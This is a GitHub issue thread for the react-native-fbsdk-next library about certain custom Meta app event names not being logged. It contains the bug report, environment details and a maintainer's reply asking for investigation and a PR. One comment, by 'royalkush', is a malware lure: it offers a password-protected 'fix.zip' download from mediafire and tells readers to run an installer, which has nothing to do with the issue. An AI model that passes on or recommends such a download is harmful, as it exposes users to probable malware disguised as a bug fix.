### ISSUE TITLE
Specific App Custom Events Not Logging

### ISSUE THREAD

**Issue by kanghyeji94** [thebergamo/react-native-fbsdk-next#547]
## 🐛 Bug Report
hello. I am using the meta app event function using react-native SDK (react-native-fbsdk-next).
I am logging custom events using the `AppEventsLogger.logEvent` method by following the guide.

However, logs are not being accumulated for specific event names.
It does not overlap with the meta official event name and does not seem to have anything to do with the string length.

There are not many channels on Meta for inquiries regarding development, so we are unable to find the cause.
Is there anyone experiencing a similar problem as me?
Please reply.

- untracked event names
  - bs_treatment_completed
  - bs_ctapartner_click
  - bs_ctahospital_click
  - bs_filterdrugdistance_click
  - bs_detailctagohospital_click
  - bs_qrhospital_completed
  - bs_reservationcancel_completed
  - bs_hospitalhealth_click
  - bs_treatment_completed

## To Reproduce
Try calling `logEvent` entering the untracked event names above as arguments.

## Environment
System:
    OS: macOS 14.2.1
    CPU: (8) arm64 Apple M1 Pro
    Memory: 50.94 MB / 16.00 GB
    Shell: 5.9 - /bin/zsh
  Binaries:
    Node: 22.2.0 - /var/folders/lh/c01gq7g17bj60x7ypv53szs80000gn/T/yarn--1724820161511-0.31325629167859503/node
    Yarn: 1.22.19 - /var/folders/lh/c01gq7g17bj60x7ypv53szs80000gn/T/yarn--1724820161511-0.31325629167859503/yarn
    npm: 10.7.0 - /opt/homebrew/bin/npm
    Watchman: 2024.05.06.00 - /opt/homebrew/bin/watchman
  Managers:
    CocoaPods: 1.14.3 - /Users/kanghyeji/.rbenv/shims/pod
  SDKs:
    iOS SDK:
      Platforms: DriverKit 23.2, iOS 17.2, macOS 14.2, tvOS 17.2, visionOS 1.0, watchOS 10.2
    Android SDK: Not Found
  IDEs:
    Android Studio: 2022.3 AI-223.8836.35.2231.10811636
    Xcode: 15.2/15C500b - /usr/bin/xcodebuild
  Languages:
    Java: 11.0.22 - /usr/bin/javac
  npmPackages:
    @react-native-community/cli: Not Found
    react: 18.2.0 => 18.2.0
    react-native: 0.71.19 => 0.71.19
    react-native-macos: Not Found
  npmGlobalPackages:
    *react-native*: Not Found

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mikehardy** [comment]
@Gitarcitano I'm the only maintainer here and this isn't a use case of mine so in effect there's no one listening for an "up" here
If this is affecting you, you'll need to fork/clone the repo and dig in deeply to investigate then propose a PR if there is something that needs to change. Users that report findings either way can help others a lot, so that's encouraged
